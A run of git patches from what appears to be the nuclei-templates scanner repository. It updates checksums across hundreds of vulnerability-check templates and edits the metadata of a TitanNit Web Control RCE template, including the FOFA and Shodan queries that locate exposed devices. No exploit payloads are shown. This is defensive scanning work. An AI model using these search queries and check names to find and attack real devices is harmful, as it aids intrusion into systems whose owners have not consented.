http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:83eeb31ba321516ebf82f3d494663984d7b9a0bc http/exposed-panels/tooljet-panel.yaml:3769667dde0edf58291e63302ba316456c70b37d http/exposed-panels/total-web-solutions-panel.yaml:b3575d91535713b5c8056f70a8b9d9821d56c58f @@ -4386,7 +4387,7 @@ http/exposed-panels/tup-openframe.yaml:808bfd74aecca717c09d60f58ab80fd51fa6e9bd http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf2 http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd -http/exposed-panels/uipath-orchestrator-panel.yaml:8f70b37f819d6a6739860e466a57c458c3260315 +http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -4395,7 +4396,7 @@ http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b http/exposed-panels/uptime-kuma-panel.yaml:e1a6b283b6595f63cffa175755728ca7ff9cd3fe -http/exposed-panels/urbackup-panel.yaml:4f3c21aee33ac1c2e559d7a677c3a4bad6c64431 +http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d http/exposed-panels/v2924-admin-panel.yaml:4a2d30c3cec92f5e7dda0bb1ba5546cf3f0fe2dc http/exposed-panels/vault-panel.yaml:5457449afaba8c2e27499d65917886a730b5a560 @@ -4726,7 +4727,7 @@ http/exposures/files/go-mod-disclosure.yaml:868457891a67709f5681525aa9e1fa81d7ff http/exposures/files/google-api-private-key.yaml:75fa461247606ff2715554666c6282ad3e91daca http/exposures/files/google-services-json.yaml:e3f8a9408fb76a37a7f38d331b6a012c31fd5db8 http/exposures/files/gradle-libs.yaml:ba505cac5c050de7f514aaadde18d09b1a85a154 -http/exposures/files/ht-deployment.yaml:39b296d319eb93c4f5c6c878fcc7fa23a867f477 +http/exposures/files/ht-deployment.yaml:8ef7e6b625ea80a08e6e3aa6af2656852ff4a4d1 http/exposures/files/iceflow-vpn-disclosure.yaml:df66610da725f7f337878ff9399791feb7f4599d http/exposures/files/idea-folder-exposure.yaml:68c0fb53827d015f0f18f127a96bd530d6c2f7a0 http/exposures/files/ioncube-loader-wizard.yaml:f2e446ca4db043d623f719abdb4c498b2ad2267f @@ -5366,7 +5367,7 @@ http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac03565db2994d603c8537 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 -http/misconfiguration/installer/phpipam-installer.yaml:b4430ea1321724f2f4c97272c846f0f859df2031 +http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0 http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49 http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91 @@ -5420,8 +5421,8 @@ http/misconfiguration/jolokia/jolokia-info-disclosure.yaml:2d5fd627a6e70403e880f http/misconfiguration/jolokia/jolokia-list.yaml:13a3592c4fac2eedfd552d94c71297c566e3de20 http/misconfiguration/jolokia/jolokia-mbean-search.yaml:a7628838f4c29926c1314116f05d448c446363fa http/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml:305a94667835c95dc45db7e8c0bb34656b1aaa13 -http/misconfiguration/jupyter-ipython-unauth.yaml:e469b645d3f979ff4d598f4646824a3618676e0a -http/misconfiguration/jupyter-lab-unauth.yaml:5ae18fc47ef98ec8d2f20efd33dc5235dbc9b1fb +http/misconfiguration/jupyter-ipython-unauth.yaml:6d92080470ea17c4994fd79bdd14fb5d1e063e9b +http/misconfiguration/jupyter-lab-unauth.yaml:5afe7cc1d146e9aca269cddeab9a0bd2092c8f2b http/misconfiguration/jupyter-notebooks-exposed.yaml:6ad5b90034ebc29ee7db3bcdc3dc98a395b2d134 http/misconfiguration/kafka-cruise-control.yaml:cea6b25e34ed34acc211ea0fdd6d795b96277a1a http/misconfiguration/kubeflow-dashboard-unauth.yaml:6fcb31eefa57633a789d6a0eb0eec723feae0b2d @@ -5536,7 +5537,7 @@ http/misconfiguration/searchreplacedb2-exposure.yaml:aa0f5a7fe0ab3a3831d42805d49 http/misconfiguration/secnet-info-leak.yaml:5f2028c717a06972b7c79f8651397eed3cbd5c37 http/misconfiguration/seeyon-unauth.yaml:327e4ce46015f481855c8a2f2f6d26b80a2f9109 http/misconfiguration/selenium-exposure.yaml:1fb605206740b5a7ec01d6ba7468b4339d8f34e9 -http/misconfiguration/sentinel-license-monitor.yaml:be1292cd7da635119a360ea3997084eebec3c807 +http/misconfiguration/sentinel-license-monitor.yaml:123e83ea787470cc96323f371c0f43ec4db9ec22 http/misconfiguration/server-status-localhost.yaml:920d65e7e9cd3d8b02094cc32aa4291a3f36df40 http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 @@ -6438,9 +6439,9 @@ http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9b http/takeovers/ghost-takeover.yaml:1302f558b7babb99a557a5b91e3e9cb4f5f7eb75 http/takeovers/gitbook-takeover.yaml:d552ad1c4821e8f77e4fcda9126f8aa5c736c7b1 http/takeovers/github-takeover.yaml:41bdd2fbe295a5faf309d521f8789ae317d4a563 -http/takeovers/gohire-takeover.yaml:7990615a28edd881f1d5e1958523630001b8edca +http/takeovers/gohire-takeover.yaml:9ddd4f9e2ac85827c10827a31c9c8dc58e3204ae http/takeovers/hatenablog-takeover.yaml:fc21976cb0c4a8fbad25b611c142c08ec4d62ac8 -http/takeovers/helpdocs-takeover.yaml:d362a488ae295a32d4d4a200c6b413a21bc4f183 +http/takeovers/helpdocs-takeover.yaml:6a5760ef0e27000d68241258b20b27ef75fb2be1 http/takeovers/helpjuice-takeover.yaml:5147fe356cc08f47440019580263508e1ae23985 http/takeovers/helprace-takeover.yaml:49c3264822b8ad59265004d9c59e54092ad6ab0c http/takeovers/helpscout-takeover.yaml:1d283328f15ec4bda0c00b289ec1f4f794386ee3 @@ -6478,7 +6479,7 @@ http/takeovers/teamwork-takeover.yaml:80d707c9c8edc27bffcc1e6652d671596cd736a2 http/takeovers/tilda-takeover.yaml:4a3011ec77333254e44089aa1ed9397913448bc3 http/takeovers/tumblr-takeover.yaml:b9ccf4e5f859efe2e752e99a45ab8fc976e4e2f8 http/takeovers/uberflip-takeover.yaml:154d577b095dc78ddeb169bfbc15747a106e4abf -http/takeovers/uptime-takeover.yaml:febc92ba91f547f348bea11ea846d84e67d9bf76 +http/takeovers/uptime-takeover.yaml:f9981402d663ec41860331ffca501a55d5a2dce0 http/takeovers/uptimerobot-takeover.yaml:491f4c81a2351d275943abe78437d45010346ef2 http/takeovers/uservoice-takeover.yaml:cfd1730b418655f4ef16ce1fd29ac406af3ac472 http/takeovers/vend-takeover.yaml:61af84b5ce0e9de0f9657e64c793e8c1f22110c6 @@ -6582,7 +6583,7 @@ http/technologies/default-detect-generic.yaml:ca71a0a6976d29ea73d53b42bf9ff61a58 http/technologies/default-django-page.yaml:abb88ae7781f8827f2666d46071d04c11900529d http/technologies/default-fastcgi-page.yaml:c323e20c1fff07ba0f4f04b5d9fd1ed3c7aca957 http/technologies/default-fedora-page.yaml:575aefbb019d68aeee55f60378ea69eb32c7bd41 -http/technologies/default-glassfish-server-page.yaml:e4bf614afcdd903ffabacdd67a2351339fd9c541 +http/technologies/default-glassfish-server-page.yaml:81cdb6b59c6f95790c0defc9224e317a02ee2aa4 http/technologies/default-jetty-page.yaml:06d951e47ad01790fcbf104d2d21b0169396b57d http/technologies/default-lighttpd-page.yaml:f1c7c4d36861dea73ae25f64b03912a873b92112 http/technologies/default-lighttpd-placeholder-page.yaml:88186b9117afcdeb7ff97ad0472733e21ec0f747 @@ -7430,7 +7431,7 @@ http/vulnerabilities/generic/cache-poisoning-xss.yaml:495b86d35d90225ef87a5996d3 http/vulnerabilities/generic/cache-poisoning.yaml:473e2165110b266d639e5a2ef0d0094c83d2b8fe http/vulnerabilities/generic/cors-misconfig.yaml:dcfbfcd736c6455b0df4eb7a580a2567e7e5b225 http/vulnerabilities/generic/crlf-injection-generic.yaml:3bda6e8d17727d06808919bcd00079598022ff1b -http/vulnerabilities/generic/error-based-sql-injection.yaml:dfe828f00d47ad5dcb5c2ddaac8fbf2b9a44297a +http/vulnerabilities/generic/error-based-sql-injection.yaml:980f8f9e4f6b572706fa03fd74b9a7a511184f95 http/vulnerabilities/generic/generic-blind-xxe.yaml:66ad01dedfa377e505690687ea24d0232e063cde http/vulnerabilities/generic/generic-env.yaml:2b3a34d9579baecdd866e228da0d44caedc8802d http/vulnerabilities/generic/generic-j2ee-lfi.yaml:92297bdf710af302b294bab83f8c7b9fe65222b7 @@ -7570,7 +7571,7 @@ http/vulnerabilities/other/comai-ras-cookie-bypass.yaml:322bafcb94fe93102fdb355b http/vulnerabilities/other/commax-biometric-auth-bypass.yaml:111b948ebcc704841a5461f72afd43c850e778f3 http/vulnerabilities/other/commax-credentials-disclosure.yaml:a0568b27fa268fd42ae80cce9e8938a5e2b96111 http/vulnerabilities/other/comtrend-password-exposure.yaml:4b467b63417a015779922bb50c68dd2b6b3eaa42 -http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml:671d8a58bf21f44cecb1f9c315f0b7365230a51b +http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml:dd31a616cc27638f7ecfdb91a7dede86b1547563 http/vulnerabilities/other/couchdb-adminparty.yaml:384135b692266f05a5bc9e507fd3f4385e8cea2d http/vulnerabilities/other/crawlab-lfi.yaml:124a1ad1f04cf5c4d9a1821b3ebe29cba5cc9ca2 http/vulnerabilities/other/crystal-live-server-lfi.yaml:ae6114c40d666570e17f1b4f2a285ddea6fa727f @@ -7872,7 +7873,7 @@ http/vulnerabilities/royalevent/royalevent-management-xss.yaml:1ab3bf42fb9af854f http/vulnerabilities/royalevent/royalevent-stored-xss.yaml:0dff308c17c106878b9b4e1474cbc88e8e5bafc6 http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:30d9d3087f11408821e363103be5281904a01ac0 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c455937c7640 -http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:f8a37860a536b0052f30424e4845106fe4ae8727 +http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:ea33d9bc0006dff61b3a252a69f6f03d6bc39716 http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:32896e606d851419b4e26f270f8bb27259b82197 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 @@ -7886,7 +7887,7 @@ http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml:de6c697deec6f9d7bebb6c http/vulnerabilities/sangfor/sangfor-edr-rce.yaml:fb51e6922c79be73ee385b0ab3d0a354868de723 http/vulnerabilities/sangfor/sangfor-login-rce.yaml:ca0c6dc2714827db2f242e9af651064df6006188 http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml:5c04024c51f1a06e1b6ddde06cfdfcdd3c597ea0 -http/vulnerabilities/secworld/secgate-3600-file-upload.yaml:960526bc991c090d69732fa4ac1e922e81c9af2f +http/vulnerabilities/secworld/secgate-3600-file-upload.yaml:bb94da21e8038d1138564b62882983f1b639d84a http/vulnerabilities/seeyon/seeyon-config-exposure.yaml:e54e5ec84a434b2d6ad2cd5656eb798a33b19c17 http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml:c701906feab26eb4b1f0e26cff7af03214cc80bc http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml:544ed4f6fea0fbe0ce50c5b180af63f7ae3f6bd3 @@ -7911,13 +7912,13 @@ http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml:e5b74c33a33e78735b02a38e http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml:4376201894d175e11d4807e8882bce683f7ad4e8 http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml:e1d54ee4243aacc767a0930df4becd0a4bdb8081 http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml:3f3eafefa0f1de31dddcaa0de6e034d9e129af8b -http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml:7e16f237182a4ee10ceedee2e2d53cc9ec55a111 +http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml:bf948c7ade1b06da12f9a3c9ab0c85b4fc32c6fd http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml:418b44ec0fe7fdc09821a93d1be1c89033656e6b http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:03c2c45139f6ccce4cae1593fa606dd52093cb7b http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:7f769d37fd1e99b8c707f15123f774320cc68a9c http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:293e13f7aa67bd4fab36c4174f5349acfcbc737b http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d829a9f8df913b7baf54effb4c7193d8 -http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:de42da198597f597766d82a7fe336c058ab1303b +http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:237187847805b1973d1d857e6d6d73a392456ad7 http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc http/vulnerabilities/tongda/tongda-auth-bypass.yaml:99626945f8fb206ae2046e9f22cebadaef9eef0e @@ -7977,30 +7978,30 @@ http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml:c3f0c658955a94c53a06dc2ff9c1 http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml:94cfa88c5b2e3fc1d06e980426f371f642b77625 http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml:c966fa0fb0f161e82c9d6eabce5249e885092f01 http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml:e4d793dc3da69b2ab7dde2ebde56cb9434db1478 -http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml:a91d880b05ababe0e0c6ab5f377474a5940b195c +http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml:c8e0153c8f3e8131f185f0059e733b5fa27cdeb7 http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml:b2185228a9540054644a97749bf5a429f6ac7458 http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml:07880415b444f544385fd0a49c4a21256d6ecad2 -http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml:47721f35dffbf64493bccfe49b937a9dc44dd912 +http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml:2884e0c62584b1fc0bf5fd1678d33a1c2e4ba6ce http/vulnerabilities/weaver/weaver-login-sessionkey.yaml:afa1d8eb6f55ee21d6ada1057ca71aca294aa8bf http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml:a79723a2c175a38175c486400904e9b966fa312d -http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml:ce60b23208195e77ff9d25b0da35d1faeb99f65c +http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml:dcc37c04500079006d0c42134d742bc5d0a0f80e http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml:54074e96088d1f83584e0691a23bfee8084b5e99 http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml:831180d7eab630a2bbef32b93ce7ceaaf7b8a271 http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml:1e1fc323fa169154911e1021beb1456212b02463 -http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:3c38d6f325e6b85d94974d0d3dc2ba9c5977d9a4 +http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:b242a2eb2712669d306bcaab5ea33d467b0a2941 http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml:5ef71d0ffcca4ea57be50a2f8782f6f9be0b2f8e http/vulnerabilities/weaver/weaver-userselect-unauth.yaml:a1babbe5ca73ebc7290010a1e5c59f8e1dedd503 http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:fe6f785e3ba7a8990a0c5b3d248c75abdeda022a http/vulnerabilities/wechat/wechat-info-leak.yaml:27dbfca0119b9e53c65be63ce5383d5eb1daf3dd http/vulnerabilities/wordpress/3d-print-lite-xss.yaml:3edc33c77331bf20781732c5362b80a26dc53d92 -http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:7acf9b6c73fa58876fdd348c2dbbfcbfa6658a94 +http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:9d221fd26d91a4ff1a6b3ecde4912a9429f218ba http/vulnerabilities/wordpress/404-to-301-xss.yaml:a30b57b7feea1bee062c7817cfa3490092945344 http/vulnerabilities/wordpress/ad-widget-lfi.yaml:621f1f5870fe1d9aaffc931cae2d4fb056fa03e4 http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml:c9bbfbbc57db9a33166819b8daffeec876ce391a http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml:1e2fa6b2e995b5df1ee6348f0a654814620961ad http/vulnerabilities/wordpress/age-gate-open-redirect.yaml:ad4e4e0acc382c26644d276706a4bc32e6019267 http/vulnerabilities/wordpress/age-gate-xss.yaml:08d5c1d82f0d874ff0949a062ee4ad1b9e820362 -http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml:1aa0349370668abfcd5773c926a0e78d61f29838 +http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml:18d7698febca91c75f2a9c3f16bc88a8f5deb2ea http/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml:fc7b4af60a185c7359af0a5c49b3093f9e4c0c1b http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml:1fc8da2828fe78559779e1800e165fade6bf6fbd http/vulnerabilities/wordpress/analytify-plugin-xss.yaml:fd07a2c6372d2a828b2215e281979ed5b85dd128 @@ -8072,7 +8073,7 @@ http/vulnerabilities/wordpress/wordpress-emergency-script.yaml:5159cd1a87927f899 http/vulnerabilities/wordpress/wordpress-git-config.yaml:72f86ca5a2dfccfb22d1920dc40c8882ec01473d http/vulnerabilities/wordpress/wordpress-gtranslate-plugin-listing.yaml:6d4f385f25334777a64c9a78b8002358fd177acd http/vulnerabilities/wordpress/wordpress-installer-log.yaml:688f9e9ce22b50b851f2268998c0904fd8147675 -http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml:7315fb52a4a7de39212c704d1bb49e8bd76b1ed2 +http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml:9055c4eed20767f772b5f9f1e5579c177eb83960 http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml:9280dc7af5a3f2f9871c7244236b44c9979580a4 http/vulnerabilities/wordpress/wordpress-redirection-plugin-listing.yaml:81e3408c327cbd5eb28c67f6f98ad6c1a41574e7 http/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml:9b21bce6d7cb90b3c3c421171f6395fcb5fa306e @@ -8116,7 +8117,7 @@ http/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml:924d721517507 http/vulnerabilities/wordpress/wp-insert-php-xss.yaml:3eaf44b66a99ef53c1740022d3fbd921f7d491e5 http/vulnerabilities/wordpress/wp-iwp-client-listing.yaml:2e6cc801fc6f3a12e5b93c42f494365294aea012 http/vulnerabilities/wordpress/wp-javospot-lfi.yaml:8b8c6f276717370636f5e4b7f14760df289da81e -http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml:ca966362e1d275aa89647e11125ba6c8f0ac6e23 +http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml:9c350652feff4df4737b9cb4911dff1693ce59a8 http/vulnerabilities/wordpress/wp-knews-xss.yaml:475fdc5ae2efdf847bc5de5683dc20d7d481a659 http/vulnerabilities/wordpress/wp-license-file.yaml:6bbd118dc5a73da7dbd67041e02e56d826e3dfd6 http/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml:4510dc0ec87ea209efbba0579e419ef70a72a2e2 @@ -8417,7 +8418,7 @@ ssl/c2/orcus-rat-c2.yaml:dea15f4e0426ff409be1fc8ab06bfc43980982ef ssl/c2/posh-c2.yaml:fed2844484f59140ce7dd1713024ef81276f26b2 ssl/c2/quasar-rat-c2.yaml:c3bf40b6fd278294f273f10d6826f401cec3cb1f ssl/c2/shadowpad-c2.yaml:45b74e7a9adff29793a0efa5bfcf1afa3bcfeacd -ssl/c2/sliver-c2.yaml:4c943cb16b5e80e2fc9276f995d89358fe57dba5 +ssl/c2/sliver-c2.yaml:35ed94dbbde1615aee5d86a3ce75791cc5d4b631 ssl/c2/venomrat.yaml:deffc1efa16ee53701962b41e8cbcab9e106208d ssl/deprecated-tls.yaml:076aee61b221863263ff2e6704bab32b362b1a67 ssl/detect-ssl-issuer.yaml:3483faacc9cc303cac30d6c844bbe0a47c1d2e39 @@ -8432,7 +8433,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7f8030d57f2bc0d1382a38af708de112a5d94b19 +templates-checksum.txt:775ace501b58833b0f3cef74dc0b686ba9e6ad7a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ce27f33042c50706c005e2aea1fe198b7727c544 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 18:59:14 +0530 Subject: [PATCH 0286/1768] Update titannit-web-ssrf.yaml --- http/vulnerabilities/titan/titannit-web-ssrf.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/titan/titannit-web-ssrf.yaml b/http/vulnerabilities/titan/titannit-web-ssrf.yaml index 365a03d776..ea1097a86b 100644 --- a/http/vulnerabilities/titan/titannit-web-ssrf.yaml +++ b/http/vulnerabilities/titan/titannit-web-ssrf.yaml @@ -1,7 +1,7 @@ -id: titannit-web-ssrf +id: titannit-web-rce info: - name: TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution + name: TitanNit Web Control 2.01/Atemio 7600 Root - Remote Code Execution author: DhiyaneshDk severity: high description: | @@ -11,9 +11,9 @@ info: - https://github.com/projectdiscovery/nuclei-templates/issues/8716 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php metadata: - fofa-query: title="TitanNit Web Control" verified: true max-request: 1 + fofa-query: title="TitanNit Web Control" tags: titanit,web-control,ssrf,oast,rce http: From 9bbfbe849a7f4344a30ebfa80721291d90d70f8d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Apr 2024 13:29:40 +0000 Subject: [PATCH 0287/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ddc2318dba..7d821d9a35 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' + - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' workflow_dispatch: jobs: From 2bdc90bf00b98a5652d984f18ccdf944c438353f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Apr 2024 13:30:43 +0000 Subject: [PATCH 0288/1768] Auto Template Signing [Tue Apr 23 13:30:43 UTC 2024] :robot: --- http/exposed-panels/bonobo-server-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/bonobo-server-panel.yaml b/http/exposed-panels/bonobo-server-panel.yaml index 77112bad94..fa831f9181 100644 --- a/http/exposed-panels/bonobo-server-panel.yaml +++ b/http/exposed-panels/bonobo-server-panel.yaml @@ -38,3 +38,4 @@ http: group: 1 regex: - '(?i)bonobo git server \((.*)\)' +# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f4c269c93f19fa614fc318f25c31ab9d1de66757 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 23 Apr 2024 19:03:03 +0530 Subject: [PATCH 0289/1768] Update and rename http/vulnerabilities/titannit/titannit-web-exposure.yaml to http/misconfiguration/titannit-web-exposure.yaml --- .../titannit-web-exposure.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) rename http/{vulnerabilities/titannit => misconfiguration}/titannit-web-exposure.yaml (82%) diff --git a/http/vulnerabilities/titannit/titannit-web-exposure.yaml b/http/misconfiguration/titannit-web-exposure.yaml similarity index 82% rename from http/vulnerabilities/titannit/titannit-web-exposure.yaml rename to http/misconfiguration/titannit-web-exposure.yaml index 77a5ac72fe..44377fb0d4 100644 --- a/http/vulnerabilities/titannit/titannit-web-exposure.yaml +++ b/http/misconfiguration/titannit-web-exposure.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: medium metadata: - shodan-query: title:"TitanNit Web Control" verified: true max-request: 1 - tags: titannit,webcontrol,exposure + shodan-query: title:"TitanNit Web Control" + tags: misconfig,titannit,webcontrol,exposure requests: - method: GET @@ -21,6 +21,8 @@ requests: part: body words: - "TitanNit Web Control" + - "System</a>" + condition: and - type: status status: From 00705e24ed17fc7c6e294ce46fc5133a2ddde47e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 23 Apr 2024 13:33:33 +0000 Subject: [PATCH 0290/1768] Auto Generated New Template Addition List [Tue Apr 23 13:33:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3deca2160a..a789829497 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/tixeo-panel.yaml +http/vulnerabilities/titan/titannit-web-ssrf.yaml From ad412c4e1c8b464ba7bbc71918a7a4bc4668c81b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 23 Apr 2024 13:33:37 +0000 Subject: [PATCH 0291/1768] Auto Generated Templates Checksum [Tue Apr 23 13:33:37 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8786b67e60..199be80162 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3553,7 +3553,7 @@ http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml:307d5cbedb06194090818643151860 http/exposed-panels/bmc-panel-detect.yaml:58bb1fc9aecb78435cfdfd60bd77eafad0cab7d0 http/exposed-panels/bolt-cms-panel.yaml:43b47b64f902654a3cca0ed56c18721974b03f07 http/exposed-panels/bomgar-login-panel.yaml:4a3abfc3af8fbb6a7cdc1a013aef84451e2b8797 -http/exposed-panels/bonobo-server-panel.yaml:823d6e139da52c3f38805f7e1d8bc8123a88b422 +http/exposed-panels/bonobo-server-panel.yaml:43a9e4867d71b96735ed7204ac8188a73e83d67f http/exposed-panels/bookstack-panel.yaml:6aa200c15b16ebfaa41c6ede6c814ccae56115fb http/exposed-panels/buddy-panel.yaml:612c814fabd73cab9fbcabc30169454db23c583b http/exposed-panels/buildbot-panel.yaml:c61b26d17d36adafb7f6642b12d64078e3aebc15 @@ -7918,6 +7918,7 @@ http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:03c2c45139f6ccce4cae1593fa60 